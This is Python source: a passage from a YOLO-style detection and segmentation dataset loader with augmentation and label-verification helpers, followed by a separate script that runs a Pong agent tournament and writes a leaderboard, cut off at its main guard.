bi = np.floor(np.arange(nu) / batch_size).astype(np.int32) # batch index
self.batch = bi # batch index of image
self.n = nu
self.indices = list(range(nu))
# Read cache contents
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove non-label entries
self._cache_items = list(cache.items())
# TODO the line below may not need to run at init time, but this is unverified
self.img_files, self.shapes, self.det_labels, self.seg_labels = self.shuffle()
self.de_label_files, self.se_label_files = img2label_paths(cache.keys()) # update
if single_cls:
for d, s in zip(self.det_labels, self.seg_labels):
d[:, 0] = 0
s[:, 0] = 0
# TODO cache images to memory to speed up training (note: large datasets may exceed available RAM)
def shuffle(self):
random.shuffle(self._cache_items) # TODO this shuffle matters
self.img_files = [item[0] for item in self._cache_items] # update
cache_values = [item[1] for item in self._cache_items]
self.shapes, self.det_labels, self.seg_labels = zip(*cache_values) # update
self.shapes = np.array(self.shapes, dtype=np.float32)
# Rectangular training
if self.rect:
# sort by aspect ratio
ar = self.shapes[:, 1] / self.shapes[:, 0] # aspect ratio
irect = ar.argsort()
ar = ar[irect]
# sort images and labels by ascending image aspect ratio
self.img_files = [self.img_files[i] for i in irect] # image paths
self.det_labels = [self.det_labels[i] for i in irect] # detection labels
self.seg_labels = [self.seg_labels[i] for i in irect] # segmentation labels
self.shapes = self.shapes[irect] # image shapes
# Set the image shapes used for training
bi = self.batch # batch index of image
nb = self.batch[-1] + 1 # number of batches
shapes = []
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes.append([maxi, 1])
elif mini > 1:
shapes.append([1, 1 / mini])
else:
shapes.append([1, 1])
self.batch_shapes = np.ceil(np.array(shapes) * self.img_size / self.stride + self.pad).astype(np.int32) * self.stride
return self.img_files, self.shapes, self.det_labels, self.seg_labels
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupted, messages
desc = f"{prefix}正在扫描 '{path.parent}({path.stem})' 中的图片和标注... "
with ThreadPool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.img_files, self.de_label_files, self.se_label_files, repeat(prefix))), desc=desc, total=len(self.img_files))
for im_file, det_labels_f, seg_labels_f, shape, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if len(det_labels_f) or len(seg_labels_f):
x[im_file] = [shape, det_labels_f, seg_labels_f]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}发现{nf}个, 丢失{nm}个, 空{ne}个, 损坏{nc}个"
pbar.close()
if msgs:
logging.info('\n'.join(msgs))
if nf == 0:
logging.info(f'{prefix}WARNING: no labels found in {path}.')
nu = len(x) # number used
x['hash'] = get_hash(self.de_label_files + self.se_label_files + self.img_files)
x['results'] = nf, nm, ne, nc, nu
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
torch.save(x, path) # save cache for next time
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: cache directory {path.parent} is not writable: {e}')
return x
def __len__(self):
return self.n
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
# assert hyp is not None
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# load mosaic
img, det_labels, seg_labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
# if random.random() < hyp['mixup']:
# img2, det_labels2, seg_labels2 = load_mosaic(self, random.randint(0, self.n - 1))
# r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
# img = (img * r + img2 * (1 - r)).astype(np.uint8)
# det_labels = np.concatenate((det_labels, det_labels2), 0)
# seg_labels = np.concatenate((seg_labels, seg_labels2), 0)
else:
# load image
img, (h0, w0), (h, w) = load_image(self, index)
# letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
det_labels = self.det_labels[index].copy()
seg_labels = self.seg_labels[index].copy()
assert isinstance(det_labels, np.ndarray), 'det_labels should be a numpy array'
assert isinstance(seg_labels, np.ndarray), 'seg_labels should be a numpy array'
if det_labels.size: # normalized xywh to pixel xyxy format
det_labels[:, 1:] = xywhn2xyxy(det_labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if seg_labels.size:
seg_labels[:, 1] = seg_xyn2xy(seg_labels[:, 1], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, det_labels, seg_labels = random_perspective(img, det_labels, seg_labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
det_labels_num = len(det_labels) # number of det_labels
if det_labels_num:
det_labels[:, 1:5] = xyxy2xywh(det_labels[:, 1:5]) # convert xyxy to xywh
det_labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
det_labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
seg_labels_num = len(seg_labels) # number of seg_labels
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if seg_labels_num:
for item in seg_labels[:, 1]:
item[:, 1] = img.shape[0] - item[:, 1]
if det_labels_num:
det_labels[:, 2] = 1 - det_labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if seg_labels_num:
for item in seg_labels[:, 1]:
item[:, 0] = img.shape[1] - item[:, 0]
if det_labels_num:
det_labels[:, 1] = 1 - det_labels[:, 1]
zeros = torch.zeros(len(det_labels), 1)
det_labels = torch.cat([zeros, torch.from_numpy(det_labels)], dim=1)
# Generate the semantic segmentation label image
seg_labels_img = generate_seg_labels_img(seg_labels, img.shape[:2])
# Convert
img = img.transpose(2, 0, 1)[::-1] # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img) # make the array contiguous in memory for faster processing
img = torch.from_numpy(img)
return img, det_labels, seg_labels_img, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, det_label, seg_label_img, path, shapes = zip(*batch) # transposed
for i in range(len(det_label)):
# add target image index for build_targets()
det_label[i][:, 0] = i
return torch.stack(img, 0), torch.cat(det_label, 0), torch.stack(seg_label_img, 0), path, shapes
@staticmethod
def collate_fn4(batch):
assert len(batch) >= 4, 'batch size must not be less than 4 when using collate_fn4'
img, det_label, seg_label_img, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, det_label4, seg_label_img4, path4, shapes4 = [], [], [], path[::4], shapes[::4]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
dl = []
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[0].type(img[i].type())
dl = det_label[i]
sl = F.interpolate(seg_label_img[i].float().unsqueeze(0).unsqueeze(0), scale_factor=2., mode='area')[0].type(img[i].type()).squeeze().int()
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
dl = torch.cat((det_label[i], det_label[i + 1] + ho, det_label[i + 2] + wo, det_label[i + 3] + ho + wo), 0) * s
sl = torch.cat((torch.cat((seg_label_img[i], seg_label_img[i + 1]), 0), torch.cat((seg_label_img[i + 2], seg_label_img[i + 3]), 0)), 1)
img4.append(im)
det_label4.append(dl)
seg_label_img4.append(sl)
for i in range(len(det_label4)):
# add target image index for build_targets()
det_label4[i][:, 0] = i
return torch.stack(img4, 0), torch.cat(det_label4, 0), torch.stack(seg_label_img4, 0), path4, shapes4
# Helper functions ----------------------------------------------------------------
def load_image(self: LoadImagesAndLabels, index: int) -> Tuple[np.ndarray, Tuple[int, int], Tuple[int, int]]:
# Load one image from the dataset; returns img, original hw, resized hw
assert isinstance(self.img_files, list)
img_path = self.img_files[index] # image path
assert os.path.isfile(img_path), f'Image not found: {img_path}'
img = Image.open(img_path) # RGB
img = exif_transpose(img) # correct image orientation from EXIF
w0, h0 = img.size # original wh
assert img.size == tuple(self.shapes[index]), f'Image size does not match cache: {img_path}'
r = self.img_size / max(w0, h0) # resize ratio
if r != 1: # resize if the image is not already at target size
new_wh = (int(w0 * r), int(h0 * r))
img = img.resize(new_wh, Image.ANTIALIAS)
img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
return img, (h0, w0), (img.shape[0], img.shape[1])
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
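# Minimal usage sketch for augment_hsv (the file name and gain values below are illustrative only):
#   img = cv2.imread('example.jpg')                       # BGR uint8 image
#   augment_hsv(img, hgain=0.015, sgain=0.7, vgain=0.4)   # jitters H/S/V in place via LUTs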
def load_mosaic(self: LoadImagesAndLabels, index):
# Load 4 images and combine them into one mosaic image
det_labels4, seg_labels4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border]
indices = [index] + random.choices(self.indices, k=3) # pick 3 additional random indices, 4 in total including the current one
random.shuffle(indices)
img4 = np.full((s * 2, s * 2, 3), 114, dtype=np.uint8)
for i, index in enumerate(indices):
# load image
img, _, (h, w) = load_image(self, index)
# place img into the corresponding quadrant of img4
x1a, y1a, x2a, y2a = 0, 0, 0, 0
x1b, y1b, x2b, y2b = 0, 0, 0, 0
if i == 0: # top left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# detection labels
det_labels = self.det_labels[index].copy()
assert isinstance(det_labels, np.ndarray)
if det_labels.size:
det_labels[:, 1:] = xywhn2xyxy(det_labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
det_labels4.append(det_labels)
# segmentation labels
seg_labels = self.seg_labels[index].copy()
assert isinstance(seg_labels, np.ndarray)
if seg_labels.size:
seg_labels[:, 1] = seg_xyn2xy(seg_labels[:, 1], w, h, padw, padh)
seg_labels4.append(seg_labels)
# Concatenate / clip labels
det_labels4 = np.concatenate(det_labels4, 0) # flatten the list of per-image det labels into one 2-D array
np.clip(det_labels4[:, 1:], 0, 2 * s, out=det_labels4[:, 1:]) # clip when using random_perspective()
seg_labels4 = np.concatenate(seg_labels4, 0) # flatten the list of per-image seg labels into one 2-D array
for x in seg_labels4:
np.clip(x[1], 0, 2 * s, out=x[1])
# Augment
assert self.hyp is not None, 'no hyp defined'
img4, det_labels4, seg_labels4 = random_perspective(img4, det_labels4, seg_labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border)
return img4, det_labels4, seg_labels4
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = (r, r) # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = (new_shape[1] / shape[1], new_shape[0] / shape[0]) # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
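# Worked example for letterbox (hypothetical input; numbers follow the code above):
#   im = np.zeros((720, 1280, 3), dtype=np.uint8)
#   out, ratio, (dw, dh) = letterbox(im, new_shape=640, auto=True, stride=32)
#   # r = min(640/720, 640/1280) = 0.5, new_unpad = (640, 360), raw dh = 280
#   # auto=True keeps only dh % 32 = 24, split into 12 px of gray (114) on top and bottom,
#   # so out.shape == (384, 640, 3) and ratio == (0.5, 0.5)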
def random_perspective(img, det_targets=(), seg_targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=.0, border=(0, 0)):
"""随机视角"""
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
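# Reading M right to left: a homogeneous point p is first re-centered (C), then perspective-warped (P),
# rotated/scaled (R), sheared (S) and finally translated into the output canvas (T),
# i.e. M @ p == T @ (S @ (R @ (P @ (C @ p)))).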
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Transform det_label coordinates
n = len(det_targets)
if n:
new = np.zeros((n, 4))
# warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = det_targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=det_targets[:, 1:5].T * s, box2=new.T, area_thr=0.10)
det_targets = det_targets[i]
det_targets[:, 1:5] = new[i]
# Transform seg_label coordinates
n = len(seg_targets)
if n:
# warp boxes
xy = seg_targets[:, 1] # xy
for i, item in enumerate(xy):
ones = np.ones((len(item), 1))
xy[i] = np.concatenate([item, ones], axis=1)
# transform
for i, item in enumerate(xy):
xy[i] = item @ M.T
# perspective rescale or affine
for i, item in enumerate(xy):
xy[i] = item[:, :2] / item[:, 2:3] if perspective else item[:, :2]
return img, det_targets, seg_targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16, special_classes=0): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & ((ar < ar_thr) | ((special_classes == 0) and (ar < 120))) # candidates
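# Worked example for box_candidates (hypothetical numbers): a 100x100 px box before augmentation
# that shrinks to 40x30 px afterwards is kept, because w2 > 2 and h2 > 2, the area ratio
# (40*30) / (100*100) = 0.12 exceeds area_thr=0.1, and the aspect ratio max(40/30, 30/40) ≈ 1.33 < 20.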
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0][0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int_)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in IMG_FORMATS], []) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink() for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0][0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
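# Illustrative outcome for autosplit (approximate counts, not from a real run): with the default
# weights (0.9, 0.1, 0.0) and a 128-image directory, roughly 115 images land in autosplit_train.txt,
# about 13 in autosplit_val.txt and none in autosplit_test.txt.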
def verify_image_label(args):
# Verify one image-label pair
im_file, dlb_file, slb_file, prefix = args
nm, nf, ne, nc, msg = 0, 0, 0, 0, '' # number (missing, found, empty, corrupt), message
try:
# Verify the image
with Image.open(im_file) as im:
im.verify() # PIL verify
shape = exif_size(im) # image size
assert im.format.lower() in IMG_FORMATS, f'Unsupported image format: {im.format}'
assert (shape[0] > 9) and (shape[1] > 9), f'Image size must be at least 10 pixels, got: {shape}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
Image.open(im_file).save(im_file, format='JPEG', subsampling=0, quality=100) # re-save image
msg = f'{prefix}WARNING: corrupt JPEG re-saved {im_file}'
# Verify detection labels
det_labels = np.zeros((0, 5), dtype=np.float32)
if os.path.isfile(dlb_file):
nf = 1 # detection label found
with open(dlb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if len(l):
det_labels = np.array(l, dtype=np.float32)
assert det_labels.shape[1] == 5, 'each label row must have 5 values'
assert (det_labels >= 0).all(), 'negative class or coordinate values found'
assert (det_labels[:, 1:] <= 1).all(), 'non-normalized or out-of-bounds coordinates'
assert np.unique(det_labels, axis=0).shape[0] == det_labels.shape[0], 'duplicate labels found'
else:
ne = 1 # detection label file is empty
else:
nm = 1
# Verify segmentation labels
seg_labels = np.zeros((0, 2))
if os.path.isfile(slb_file):
with open(slb_file, 'r') as f:
l = []
for line in f.read().strip().splitlines():
items = line.split()
l.append(np.array(items, dtype=np.float32))
if len(l):
assert all([(item >= 0).all() for item in l]), 'negative class or coordinate values found'
assert all([(item[1:] <= 1).all() for item in l]), 'non-normalized or out-of-bounds coordinates'
seg_labels = np.array([[int(item[0]), np.array(item[1:], dtype=np.float32)] for item in l], dtype=object)
seg_labels[:, 1] = [item.reshape(-1, 2) for item in seg_labels[:, 1]]
return im_file, det_labels, seg_labels, shape, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: ignoring corrupt image/label {im_file}: {e}'
return None, None, None, None, nm, nf, ne, nc, msg
|
epic_battle_royale.py
|
import argparse
import sys
import os
from pong_testbench import PongTestbench
from multiprocessing import Process, Queue
from matplotlib import font_manager
from time import sleep
import importlib
import traceback
import numpy as np
import pickle
parser = argparse.ArgumentParser()
parser.add_argument("dir", type=str, help="Directory with agents.")
parser.add_argument("--render", "-r", action="store_true", help="Render the competition.")
parser.add_argument("--games", "-g", type=int, default=100, help="Number of games.")
parser.add_argument("--max_proc", "-p", type=int, default=4, help="Max number of processes.")
parser.add_argument("--start-file", "-f", type=str, default=None, help="Start file")
args = parser.parse_args()
save_file = "ebr_save.p"
def run_test(id1, agent1_dir, id2, agent2_dir, queue, games, render):
# Add the first agent to Python import path
sys.path.insert(0, agent1_dir)
orig_wd = os.getcwd()
# Import the first agent
try:
import agent
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while importing 1st agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# chdir to the directory (needed for loading the model)
# and instantiate the agent
os.chdir(agent1_dir)
try:
agent1 = agent.Agent()
agent1.load_model()
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while loading 1st agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# Go back to the original directory
os.chdir(orig_wd)
# Remove agent1 from path
del sys.path[0]
# Add the 2nd agent to path
sys.path.insert(0, agent2_dir)
# reload the agent module using agent_ac.py from the new dir
try:
importlib.reload(agent)
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while importing 2nd agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# chdir, instantiate, cleanup (same as before)
os.chdir(agent2_dir)
try:
agent2 = agent.Agent()
agent2.load_model()
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while loading 2nd agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
os.chdir(orig_wd)
del sys.path[0]
# Get names
name1 = agent1.get_name()
name2 = agent2.get_name()
# Create and init the testbench for the agents
testbench = PongTestbench(render)
testbench.init_players(agent1, agent2)
# Run the match
try:
testbench.run_test(games)
except Exception as e:
print(f"!!! Something went wrong in {name1} ({id1}) vs {name2} ({id2})")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# Get scores and pass them to the parent process
wins1, games = testbench.get_agent_score(agent1)
wins2, games = testbench.get_agent_score(agent2)
print(f"{name1} vs {name2} finished, wins1={wins1}, wins2={wins2}")
queue.put((id1, id2, wins1, wins2, name1, name2, games))
def get_directories(top_dir):
subdir_list = []
subdir_gen = os.walk(top_dir)
# Recursively scout the directory for agents
for dir, subdirs, files in subdir_gen:
if "__pycache__" in dir:
continue
if "agent_ac.py" not in files:
print("Warn: No agent_ac.py found in %s. Skipping." % dir)
continue
subdir_list.append(dir)
print("%s added to directory list." % dir)
subdir_list.sort()
# Return a list of folders with agent_ac.py
return subdir_list
def epic_battle_royale(top_dir, max_proc=4):
directories = get_directories(top_dir)
names = ["__unknown__"] * len(directories)
procs = []
result_queue = Queue()
all_results = []
skipdict = []
print("Finished scanning for agents; found:", len(directories))
if args.start_file is not None:
with open(args.start_file, "rb") as f:
all_results = pickle.load(f)
for id1, id2, wins1, wins2, name1, name2, games in all_results:
print(f"Skipping {name1}:{name2} cause already played")
skipdict.append((id1, id2))
print(f"Total skipped: {len(skipdict)}")
for i1, d1 in enumerate(directories):
for i2, d2 in enumerate(directories):
if i1 == i2:
continue
if (i1, i2) in skipdict:
continue
pargs = (i1, d1, i2, d2, result_queue, args.games, args.render)
proc = Process(target=run_test, args=pargs)
procs.append(proc)
print("Living procs:", sum(p.is_alive() for p in procs))
while sum(p.is_alive() for p in procs) >= max_proc:
sleep(0.3)
print("Starting process (%d / %d)" % (i1*len(directories) + i2, len(directories)**2))
proc.start()
sleep(1)
# Join dead ones
new_p = []
for p in procs:
if not p.is_alive():
p.join(1)
else:
new_p.append(p)
procs = new_p
while result_queue.qsize() > 0:
all_results.append(result_queue.get())
with open(save_file, "wb") as f:
pickle.dump(all_results, f)
for p in procs:
try:
# Give it some final timeout. 20 sec/game is a very safe choice.
# It shouldn't happen anyway; it's there just to prevent us from
# losing all results in case of some pipes issues or a deadlock
timeout = args.games * 20
p.join(timeout)
p.terminate()
# Prevent errors in old Python versions
if hasattr(p, "kill"):
p.kill()
except Exception as e:
print("Join/Terminate/Kill error")
traceback.print_exc()
while result_queue.qsize() > 0:
all_results.append(result_queue.get())
# Fetch all results from the queue
no_agents = len(directories)
games_won = np.zeros((no_agents, no_agents), dtype=np.int32)
total_games = np.zeros((no_agents, ), dtype=np.int32)
for id1, id2, wins1, wins2, name1, name2, games in all_results:
# Sanity check...
if wins1 + wins2 != games:
print(f"Wins dont sum up! {name1} vs {name2}: {wins1}+{wins2} != {games}")
games_won[id1, id2] += wins1
games_won[id2, id1] += wins2
names[id1] = name1
names[id2] = name2
total_games[id1] += games
total_games[id2] += games
# Save raw results as numpy
np.save("brres", games_won)
# Format: Wins of ROW versus COLUMN
np.savetxt("battle_royale_results.txt", games_won, fmt="%d")
np.savetxt("battle_royale_players.txt", directories, fmt="%s")
# Sum across columns to get total wins of each agent
total_wins = games_won.sum(axis=1)
# And across rows to get total losses.
total_losses = games_won.sum(axis=0)
agent_wins = list(zip(total_wins, total_losses, names, directories, total_games))
agent_wins.sort(key=lambda x: -x[0])
# Save the leaderboard
resfile = open("leaderboard.txt", "w")
print("")
print("-"*80)
print("--- LEADERBOARD ---")
for i, (wins, losses, name, dir, games) in enumerate(agent_wins):
winrate = wins/(wins+losses)
line = f"{i+1}. {name} with {wins} wins in {games} games (winrate {winrate*100:.2f}%) (from {dir})"
resfile.write(line+"\n")
print(line)
resfile.close()
print("-"*80)
print("")
print("Finished!")
if __name__ == "__main__":
